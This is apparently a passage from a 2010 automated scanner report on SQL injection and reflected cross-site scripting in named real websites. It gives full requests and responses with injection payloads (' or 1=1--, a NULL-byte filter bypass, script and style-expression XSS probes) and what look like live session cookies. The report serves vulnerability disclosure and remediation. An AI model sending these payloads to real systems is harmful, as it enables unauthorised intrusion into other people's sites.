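Against the concatenated query the TRUE payload returns all three seeded rows and the FALSE payload returns none, which is exactly the kind of payload-dependent difference the scanner reports; against the parameterised query both payloads return nothing, because the driver never lets the quote or the comment sequence reach the SQL parser. When triaging a Tentative finding like 1.1, the question to answer is whether the observed difference is of this payload-dependent kind or merely a timestamp.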

Request 1

GET /jsignin25257047'%20or%201%3d1--%20?o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 16:59:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 16:59:40 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjU5OjQwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:59:40 GMT; Path=/
Set-Cookie: jss=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:59:40 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:59:40 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 77281

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
text/javascript">JASK.cfg = (function() {return {"ldomain":"http://www.ask.com","_ldomain":"www.ask.com","secureDomain":"secure.ask.com","uid":"","poll":"false","username":"","avatarurl":"","queryid":"D0BCE2043484BBAADDA838DEC3453BAD","isQuestion":false,"protocol":"https","cleanusername":"","feedbackUrl":"http://feedback.ask.com","thinHeader":"false","fullFlex":"false","viewerIsOwner":"false","trackerImpressionUri":"http://www.ask.com/tracker/i/","trackerActivityUri":"http://www.ask.com/tracker/a/","trackerData":{"ld":"","qsrc":"119","o":"0","l":"dir"},"gigyaAPIKey":'2_kF3uRGWN0bDCn_y8GPWYEQPm_IzHqFvA4P0E2loB9eB0TfwsC2Zjd08EOqXYbqcu',"isAnswerExchangePartner":''};})();</script></head><body><div id="navbar" class="navbar fade"><div class="left shsp"><span class="selected txt3">Web</span><a id="nbImages" href="pictureslanding?o=0&l=dir" class="txt3" >Images</a><a id="nbNews" href="news?o=0&l=dir" class="txt3" >News</a><a id="nbVideos" href="videos?o=0&l=dir" class="txt3" >Videos</a><div class="mlinks"><a id="nbThemes" href="skins?o=0&l=dir" class="txt1" >Themes</a><a id="nbAdvancedSearch" href="webadvanced?o=0&l=dir" class="txt1" >Advanced Search</a><a id="nbSettings" href="settings?o=0&l=dir" class="txt1" >Settings</a><a id="nbSignIn" href="jsignin?o=0&l=dir" class="txt1" >Sign In</a></div></div><div class="cap shsp"></div></div><div id="md_qboxLayout" class="module qboxlayout"><div class="qbox sprite"><div class="input" name="searchBoxContainer"><form action="web"><input id="q" name="q" value="" class="query" value="" autocomplete="off" /><input id="sbut" type="submit" name="search" value="" class="sprite"><input id="qsrc" type="hidden" name="qsrc" value="0" /><input id="origin" type="hidden" name="o" value="0" /><input id="partner" type="hidden" name="l" value="dir" /></form></div><script type="text/javascript">document.getElementById('q').focus();</script></div><div class="peel fade"><a href="skins?o=0&l=dir"></a></div></div><div id="content" class="fade"><div 
id="content_cap" class="sprite"></div><div id="content_content" class="sprite"><div class="sections"><div id="md_cns1" class="qotd sprite"><div class="hda"><a href="http://www.ask.com/questionoftheday" cl
...[SNIP]...

Request 2

GET /jsignin25257047'%20or%201%3d2--%20?o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 16:59:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 16:59:41 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjU5OjQxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:59:41 GMT; Path=/
Set-Cookie: jss=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:59:41 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:59:41 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 77270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
text/javascript">JASK.cfg = (function() {return {"ldomain":"http://www.ask.com","_ldomain":"www.ask.com","secureDomain":"secure.ask.com","uid":"","poll":"false","username":"","avatarurl":"","queryid":"E421B13EA871884DB455E4D924D28EB4","isQuestion":false,"protocol":"https","cleanusername":"","feedbackUrl":"http://feedback.ask.com","thinHeader":"false","fullFlex":"false","viewerIsOwner":"false","trackerImpressionUri":"http://www.ask.com/tracker/i/","trackerActivityUri":"http://www.ask.com/tracker/a/","trackerData":{"ld":"","qsrc":"119","o":"0","l":"dir"},"gigyaAPIKey":'2_kF3uRGWN0bDCn_y8GPWYEQPm_IzHqFvA4P0E2loB9eB0TfwsC2Zjd08EOqXYbqcu',"isAnswerExchangePartner":''};})();</script></head><body><div id="navbar" class="navbar fade"><div class="left shsp"><span class="selected txt3">Web</span><a id="nbImages" href="pictureslanding?o=0&l=dir" class="txt3" >Images</a><a id="nbNews" href="news?o=0&l=dir" class="txt3" >News</a><a id="nbVideos" href="videos?o=0&l=dir" class="txt3" >Videos</a><div class="mlinks"><a id="nbThemes" href="skins?o=0&l=dir" class="txt1" >Themes</a><a id="nbAdvancedSearch" href="webadvanced?o=0&l=dir" class="txt1" >Advanced Search</a><a id="nbSettings" href="settings?o=0&l=dir" class="txt1" >Settings</a><a id="nbSignIn" href="jsignin?o=0&l=dir" class="txt1" >Sign In</a></div></div><div class="cap shsp"></div></div><div id="md_qboxLayout" class="module qboxlayout"><div class="qbox sprite"><div class="input" name="searchBoxContainer"><form action="web"><input id="q" name="q" value="" class="query" value="" autocomplete="off" /><input id="sbut" type="submit" name="search" value="" class="sprite"><input id="qsrc" type="hidden" name="qsrc" value="0" /><input id="origin" type="hidden" name="o" value="0" /><input id="partner" type="hidden" name="l" value="dir" /></form></div><script type="text/javascript">document.getElementById('q').focus();</script></div><div class="peel fade"><a href="skins?o=0&l=dir"></a></div></div><div id="content" class="fade"><div 
id="content_cap" class="sprite"></div><div id="content_content" class="sprite"><div class="sections"><div id="md_cns1" class="qotd sprite"><div class="hda"><a href="http://www.ask.com/questionoftheday" cl
...[SNIP]...

1.2. http://www.ask.com/local [gc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ask.com
Path:   /local

Issue detail

The gc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /local?qsrc=3103 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=%00'; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 17:01:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 17:01:20 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAxOjIwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:01:20 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:01:20 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 194832


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<noscript>
<meta http-equiv="refresh" content="0;URL=http://www.ask.com/loc
...[SNIP]...
<div class="txt3 abstract">

Diners who want to experience exceptional Indian cuisine take a short trip to Bombay Brasserie. Now, in addition to our existing West University location, we are pleased to announce the opening of our Galleria location, just off of 610 and
...[SNIP]...

Request 2

GET /local?qsrc=3103 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=%00''; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 17:01:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 17:01:28 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAxOjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:01:28 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:01:28 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 194829


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<noscript>
<meta http-equiv="refresh" content="0;URL=http://www.ask.com/loc
...[SNIP]...

2. Cross-site scripting (reflected)
There are 291 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses. In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ad.vulnerable.ad.partner/adj/Auctions/ros [kw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/Auctions/ros

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2636'%3balert(1)//bbf2983398d was submitted in the kw parameter. This input was echoed as b2636';alert(1)//bbf2983398d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/Auctions/ros;kw=b2636'%3balert(1)//bbf2983398d HTTP/1.1
Accept: */*
Referer: http://network.nhl.com/auct_index.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 409
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 20 Nov 2010 18:13:23 GMT
Expires: Sat, 20 Nov 2010 18:13:23 GMT

document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/0/0/%2a/f;232303829;0-0;0;13225709;255-0/0;39214187/39231974/1;;~okv=;kw=b2636';alert(1)//bbf2983398d;~aopt=2/1/aa/0;~sscs=%3fhttp://shop.nhl.com/entry.point?target=z&source=NHL_BAN:FS$85NOV468x60Static:11.03.10">
...[SNIP]...

2.2. http://ad.vulnerable.ad.partner/adj/Auctions/ros [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/Auctions/ros

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2667'-alert(1)-'aad659deeb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/Auctions/ros;kw=auctions;sz=468x60;ord=1290275809723?&a2667'-alert(1)-'aad659deeb0=1 HTTP/1.1
Accept: */*
Referer: http://network.nhl.com/auct_index.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 18:13:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 432

document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/0/0/%2a/b;232303829;0-0;0;13225709;1-468/60;39214187/39231974/1;;~okv=;kw=auctions;sz=468x60;;a2667'-alert(1)-'aad659deeb0=1;~aopt=2/1/aa/0;~sscs=%3fhttp://shop.nhl.com/entry.point?target=z&source=NHL_BAN:FS$85NOV468x60Static:11.03.10">
...[SNIP]...

2.3. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29442"-alert(1)-"a82b9d9e55a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=300x250&section=1299725&29442"-alert(1)-"a82b9d9e55a=1 HTTP/1.1
Accept: */*
Referer: http://209.197.9.121/v8u2m5i8/cds/i/i2.html?t=2-1005410&dopvhost=adserving.cpxadroit.com&doppl=f34985b9bfae7845bffe78456e3b71c8&dopsig=1df9c0848e5f514e60141317d7bee37f
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserving.cpxinteractive.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:50:15 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 20 Nov 2010 16:50:15 GMT
Pragma: no-cache
Content-Length: 4334
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://adserving.cpxinteractive.com/imp?29442"-alert(1)-"a82b9d9e55a=1&Z=300x250&s=1299725&_salt=1744088892";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A
...[SNIP]...

2.4. http://auction.nhl.com/cgi-bin/ncommerce3/User [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://auction.nhl.com
Path:   /cgi-bin/ncommerce3/User

Issue detail

The value of the id request parameter is copied into the HTML document as text between TITLE tags. The payload 5f651</title><script>alert(1)</script>0e9cb24f1cc was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/ncommerce3/User?id=hfcNHL5f651</title><script>alert(1)</script>0e9cb24f1cc&wl=12717464&type=L HTTP/1.1
Host: auction.nhl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200
Connection: close
Date: Sat, 20 Nov 2010 17:53:15 GMT
Server: Microsoft-IIS/6.0
Content-type: text/html
Set-cookie: TRUID=-1; path=/;
Set-cookie: SESSION_ID=-1,ceWj4vHmggM0P+5m0PkYbJ/Bg2JOsnfWuIEa/JRC856+RLBNS0fhxA==; path=/;


<!--


-->


<HTML>


<HEAD>
<TITLE>NHL Auctions Hockey Memorabilia - Listings for hfcNHL5f651</title><script>alert(1)</script>0e9cb24f1cc</TITLE>
...[SNIP]...

2.5. http://auction.nhl.com/cgi-bin/ncommerce3/User [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://auction.nhl.com
Path:   /cgi-bin/ncommerce3/User

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be2a4"><script>alert(1)</script>a0866ed5e5f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/ncommerce3/User?id=hfcNHLbe2a4"><script>alert(1)</script>a0866ed5e5f&wl=12717464&type=L HTTP/1.1
Host: auction.nhl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200
Connection: close
Date: Sat, 20 Nov 2010 17:53:13 GMT
Server: Microsoft-IIS/6.0
Content-type: text/html
Set-cookie: TRUID=-1; path=/;
Set-cookie: SESSION_ID=-1,ceWj4vHmggM0P+5m0PkYbJ/Bg2JOsnfWuIEa/JRC856+RLBNS0fhxA==; path=/;


<!--


-->


<HTML>


<HEAD>
<TITLE>NHL Auctions Hockey Me
...[SNIP]...
<input type="hidden" NAME="id" value="hfcNHLbe2a4"><script>alert(1)</script>a0866ed5e5f" >
...[SNIP]...

2.6. http://auction.nhl.com/cgi-bin/ncommerce3/User [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://auction.nhl.com
Path:   /cgi-bin/ncommerce3/User

Issue detail

The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dcbb"><script>alert(1)</script>597da3a48aa was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/ncommerce3/User?id=hfcNHL&wl=12717464&type=L2dcbb"><script>alert(1)</script>597da3a48aa HTTP/1.1
Host: auction.nhl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200
Connection: close
Date: Sat, 20 Nov 2010 17:53:16 GMT
Server: Microsoft-IIS/6.0
Content-type: text/html
Set-cookie: TRUID=-1; path=/;
Set-cookie: SESSION_ID=-1,ceWj4vHmggM0P+5m0PkYbJ/Bg2JOsnfWuIEa/JRC856+RLBNS0fhxA==; path=/;


<!--


-->


<HTML>


<HEAD>
<TITLE>NHL Auctions Hockey Me
...[SNIP]...
<input type="hidden" NAME="type" value="L2dcbb"><script>alert(1)</script>597da3a48aa" >
...[SNIP]...

2.7. https://checkout.netsuite.com/app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1205'style%3d'x%3aexpression(alert(1))'04ac6827f1e was submitted in the REST URL parameter 4. This input was echoed as d1205'style='x:expression(alert(1))'04ac6827f1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /app/center/nlvisitor.nl/c.1034828d1205'style%3d'x%3aexpression(alert(1))'04ac6827f1e/n.3/sc.6/.f HTTP/1.1
Host: checkout.netsuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.2.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:25:30 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2036709634:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
